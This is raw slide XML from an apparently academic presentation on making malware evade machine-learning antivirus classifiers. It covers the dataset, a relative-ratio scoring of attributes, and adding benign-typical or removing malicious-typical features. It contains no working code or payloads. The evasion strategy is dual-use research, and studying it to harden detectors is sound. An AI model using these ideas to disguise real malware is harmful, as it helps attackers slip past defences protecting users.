    <dgm:cxn modelId="{47880A62-9D8C-DA4C-B57D-BF8C58817E5E}" type="presParOf" srcId="{69388C95-FD5B-9246-824E-37F3B17BC679}" destId="{9BE778CB-7BCC-6148-8551-01AE6C9DE23B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{9D86B458-99D7-144A-954B-84B5ECE96651}" type="presParOf" srcId="{69388C95-FD5B-9246-824E-37F3B17BC679}" destId="{BA60F260-AE86-6D42-9E37-2AF753B6C3AC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{4EC2FBCC-3781-2B49-B990-740E1C67C099}" type="presParOf" srcId="{BA60F260-AE86-6D42-9E37-2AF753B6C3AC}" destId="{7CF04755-3D43-F347-8226-4A3ACD62BC17}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6C1933A2-FB27-4A43-B195-2E4855381BC5}" type="presParOf" srcId="{69388C95-FD5B-9246-824E-37F3B17BC679}" destId="{19325DD8-264F-B844-A054-F5F27CAF19E5}"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3C869-CE3D-2641-A9D2-A54B54092C2C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>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Modify attributes blindly</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="28417" y="28417"/>
        <a:ext cx="5377181" cy="913392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{716BFCBE-5464-7C43-9486-61C2D2F67B5B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2535089" y="994482"/>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86026" y="1030865"/>
        <a:ext cx="261962" cy="254685"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9BE778CB-7BCC-6148-8551-01AE6C9DE23B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1455340"/>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Look for best hiding modifications</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="28417" y="1483757"/>
        <a:ext cx="5377181" cy="913392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BA60F260-AE86-6D42-9E37-2AF753B6C3AC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2535089" y="2449823"/>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86026" y="2486206"/>
        <a:ext cx="261962" cy="254685"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{19325DD8-264F-B844-A054-F5F27CAF19E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2910681"/>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Match with existing schemes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="28417" y="2939098"/>
        <a:ext cx="5377181" cy="9133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3C869-CE3D-2641-A9D2-A54B54092C2C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>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Analyze from existing schemes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="28417" y="28417"/>
        <a:ext cx="5396225" cy="913392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{716BFCBE-5464-7C43-9486-61C2D2F67B5B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2544611" y="994482"/>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95548" y="1030865"/>
        <a:ext cx="261962" cy="254685"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9BE778CB-7BCC-6148-8551-01AE6C9DE23B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1455340"/>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Extract</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> into attributes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="28417" y="1483757"/>
        <a:ext cx="5396225" cy="913392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BA60F260-AE86-6D42-9E37-2AF753B6C3AC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2544611" y="2449823"/>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95548" y="2486206"/>
        <a:ext cx="261962" cy="254685"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{19325DD8-264F-B844-A054-F5F27CAF19E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2910681"/>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Test</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> with modified data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="28417" y="2939098"/>
        <a:ext cx="5396225" cy="9133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DB55A-F66E-884C-A409-CC81ACA880E7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/12/17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63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181271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 bunch of anti-virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> software, detecting malicious apps/binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>No interested in detecting , but</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>However, to learn how to evade detection, first, </a:t>
            </a:r>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150517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many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dataset we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can find.</a:t>
            </a:r>
          </a:p>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1887658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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184693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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1186452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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2004888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key idea of the project is to use machine learning as a tool to help us better understand how a virus can hide itself from the detection of antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>softwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. Hiding malicious traces is a long-existing topic and new techniques keep emerging. However, there has never been a systematic way for the job. Thus we want to test from the database how a malicious can be disguised so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that it is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> undetected by certain classifier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Best</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> modification: with least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>modified attributes; adding better than removing</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63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="848701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dataset is about malicious executables (virus). Common features are extracted from real-world malicious and non-malicious executables. The dataset is very new (published in March 2016) but the weakness is that the sample number is relatively low compared to other datasets. However, the goal of our project is not to exhaustively find the best machine learning model to classify malicious and non-malicious executables. Thus we think the low sample amount is tolerable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="619500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do so, we can directly modify the extracted attributes rather than really implementing specific virus programs. This will also give us more global view of the topic.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="758887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Meanwhile, we will also compare the modifications we do to existing hiding schemes in security field. It can be done in two directions. Firstly, we blindly modify dataset and look for possible way to hide a malicious executable. Then we compare such way to existing schemes. Secondly, we try extracting from existing schemes possible ways to modify the dataset and verify if that can work for certain classifier models.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1111927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4/12/17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4/12/17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4/12/17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4/12/17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upx.github.i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5"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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.tiff"/><Relationship Id="rId6"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4218" y="1516157"/>
            <a:ext cx="9996426" cy="2262781"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Evading the Machine Learning Detector: A Virus’ Perspective</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="4675779"/>
            <a:ext cx="9196387" cy="1187992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Group 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Yuan Xiao, Xiaokuan Zhang</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19577477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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>test: Adding Single Attribute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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396" y="1222991"/>
            <a:ext cx="7474139" cy="5593445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9371189" y="3542659"/>
            <a:ext cx="2928142" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better solution?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109634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modification strategy (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986117" y="2161309"/>
            <a:ext cx="11044518" cy="4382926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>every attribute X(1~530) in the training set, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>compute:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Positive Ratio (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>PR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(benign instances that have attribute X) 								 	/(total benign instances)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Negative Ratio(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>NR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>instances </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>that have attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>X) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>								</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>total malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>instances)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ratio (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PR - NR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Sort all attributes by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>RR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>High RR: attribute X appears more often in benign samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Low RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>malicious samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13348252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modification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>strategy (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="2133600"/>
            <a:ext cx="9405564" cy="3777622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>attributes with highest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>RR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>attributes with lowest </a:t>
            </a:r>
            <a:r>
